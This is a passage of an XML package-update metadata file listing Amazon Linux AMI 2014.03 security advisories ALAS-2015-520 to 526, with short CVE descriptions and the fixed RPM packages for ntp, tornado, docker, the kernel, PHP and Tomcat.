arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.15.0-26.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-520</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-520: important priority package update for ntp</title><issued date="2015-05-05 15:56:00" /><updated date="2015-05-24 14:16:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1799:
The symmetric-key feature in the receive function in ntp_proto.c in ntpd in NTP 3.x and 4.x before 4.2.8p2 performs state-variable updates upon receiving certain invalid packets, which makes it easier for man-in-the-middle attackers to cause a denial of service (synchronization loss) by spoofing the source IP address of a peer.
1199435:
CVE-2015-1799 ntp: authentication doesn't protect symmetric associations against DoS attacks
CVE-2015-1798:
The symmetric-key feature in the receive function in ntp_proto.c in ntpd in NTP 4.x before 4.2.8p2 requires a correct MAC only if the MAC field has a nonzero length, which makes it easier for man-in-the-middle attackers to spoof packets by omitting the MAC.
1199430:
CVE-2015-1798 ntp: ntpd accepts unauthenticated packets with symmetric key crypto
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798" title="" id="CVE-2015-1798" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799" title="" id="CVE-2015-1799" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-30.24.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-30.24.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-30.24.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-30.24.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-30.24.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-30.24.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-30.24.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-30.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-521</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-521: low priority package update for python-tornado</title><issued date="2015-05-05 21:31:00" 
/><updated date="2015-05-06 15:14:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2099:
A denial of service flaw was found in the way Python's SSL module implementation performed matching of certain certificate names. A remote attacker able to obtain a valid certificate that contained multiple wildcard characters could use this flaw to issue a request to validate such a certificate, resulting in excessive consumption of CPU.
963260:
CVE-2013-2099 python: ssl.match_hostname() DoS via certificates with specially crafted hostname wildcard patterns
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2099" title="" id="CVE-2013-2099" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-tornado" version="2.2.1" release="7.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-tornado-2.2.1-7.7.amzn1.noarch.rpm</filename></package><package name="python26-tornado" version="2.2.1" release="7.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-tornado-2.2.1-7.7.amzn1.noarch.rpm</filename></package><package name="python27-tornado-doc" version="2.2.1" release="7.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-tornado-doc-2.2.1-7.7.amzn1.noarch.rpm</filename></package><package name="python26-tornado-doc" version="2.2.1" release="7.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-tornado-doc-2.2.1-7.7.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-522</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-522: critical priority package update for docker</title><issued date="2015-05-07 13:37:00" /><updated date="2015-05-06 13:37:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3631:
reserved
CVE-2015-3630:
reserved
CVE-2015-3629:
reserved
CVE-2015-3627:
reserved
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3627" title="" id="CVE-2015-3627" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3629" title="" id="CVE-2015-3629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3630" title="" id="CVE-2015-3630" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3631" title="" id="CVE-2015-3631" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="1.6.0" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-1.6.0-1.3.amzn1.x86_64.rpm</filename></package><package name="docker-pkg-devel" version="1.6.0" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-pkg-devel-1.6.0-1.3.amzn1.x86_64.rpm</filename></package><package name="docker-devel" version="1.6.0" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-devel-1.6.0-1.3.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-523</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-523: medium priority package update for kernel</title><issued date="2015-05-14 14:27:00" /><updated date="2015-05-14 23:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3636:
It was found that the Linux kernel's ping socket implementation did not properly handle socket unhashing during spurious disconnects, which could lead to a use-after-free flaw. On x86-64 architecture systems, a local user able to create ping sockets could use this flaw to crash the system. On non-x86-64 architecture systems, a local user able to create ping sockets could use this flaw to escalate their privileges on the system.
1218074:
CVE-2015-3636 kernel: ping sockets: use-after-free leading to local privilege escalation
CVE-2015-3331:
It was found that the Linux kernel did not correctly decrypt fragmented network packets when using the Intel AES-NI instructions for the AES algorithm. A remote attacker could use this flaw to crash a system by sending specially crafted AES-encrypted packets to that system.
A buffer overflow flaw was found in the way the Linux kernel's Intel AES-NI instructions optimized version of the RFC4106 GCM mode decryption functionality handled fragmented packets. A remote attacker could use this flaw to crash, or potentially escalate their privileges on, a system over a connection with an active AES-GCM mode IPSec security association.
1213322:
CVE-2015-3331 Kernel: crypto: buffer overruns in RFC4106 implementation using AESNI
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3331" title="" id="CVE-2015-3331" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3636" title="" id="CVE-2015-3636" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.14.42" release="31.38.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.42" release="31.38.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-devel-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.42" release="31.38.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.14.42-31.38.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-524</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-524: medium priority package update for php</title><issued date="2015-05-14 14:31:00" /><updated date="2015-05-14 23:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2305:
Integer overflow in the regcomp implementation in the Henry Spencer BSD regex library (aka rxspencer) alpha3.8.g5 on 32-bit platforms, as used in NetBSD through 6.1.5 and other products, might allow context-dependent attackers to execute arbitrary code via a large regular expression that leads to a heap-based buffer overflow.
1191049:
CVE-2015-2305 regex: heap overflow in regcomp() on 32-bit architectures
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305" title="" id="CVE-2015-2305" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-common" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-enchant" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-enchant-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.29" release="1.8.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-odbc-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.29" release="1.8.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-embedded-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.29" release="1.8.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-devel-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.29" release="1.8.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-tidy-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.29" release="1.8.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-embedded-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-enchant" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-enchant-5.3.29-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-525</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-525: medium priority package update for tomcat6</title><issued date="2015-05-14 14:33:00" /><updated date="2015-05-14 23:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0227:
It was discovered that the ChunkedInputFilter in Tomcat did not fail subsequent attempts to read input after malformed chunked encoding was detected. A remote attacker could possibly use this flaw to make Tomcat process part of the request body as a new request, or cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0227" title="" id="CVE-2014-0227" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0991.html" title="" id="RHSA-2015:0991" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-docs-webapp" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.43-1.2.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-526</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-526: medium priority package update for tomcat7</title><issued date="2015-05-14 14:38:00" /><updated date="2015-05-14 23:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0227:
It was discovered that the ChunkedInputFilter in Tomcat did not fail subsequent attempts to read input after malformed chunked encoding was detected. A remote attacker could possibly use this flaw to make Tomcat process part of the request body as a new request, or cause a denial of service.
1109196:
CVE-2014-0227 Tomcat/JBossWeb: request smuggling and limited DoS in ChunkedInputFilter
CVE-2014-0099:
It was found that JBoss Web / Apache Tomcat did not check for overflowing values when parsing request content length headers. A remote attacker could use this flaw to perform an HTTP request smuggling attack on a JBoss Web / Apache Tomcat server located behind a reverse proxy that processed the content length header correctly.
1102030:
CVE-2014-0099 Tomcat/JBossWeb: Request smuggling via malicious content length header
CVE-2014-0096:
It was found that the org.apache.catalina.servlets.DefaultServlet implementation in JBoss Web / Apache Tomcat allowed the definition of XML External Entities (XXEs) in provided XSLTs. A malicious application could use this to circumvent intended security restrictions to disclose sensitive information.
1088342:
CVE-2014-0096 Tomcat/JBossWeb: XXE vulnerability via user supplied XSLTs
CVE-2014-0075:
It was discovered that JBoss Web / Apache Tomcat did not limit the length of chunk sizes when using chunked transfer encoding. A remote attacker could use this flaw to perform a denial of service attack against JBoss Web / Apache Tomcat by streaming an unlimited quantity of data, leading to excessive consumption of server resources.
1072776:
CVE-2014-0075 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0075" title="" id="CVE-2014-0075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0096" title="" id="CVE-2014-0096" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0099" title="" id="CVE-2014-0099" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0227" title="" id="CVE-2014-0227" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-admin-webapps" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.59" release="1.8.amzn1" 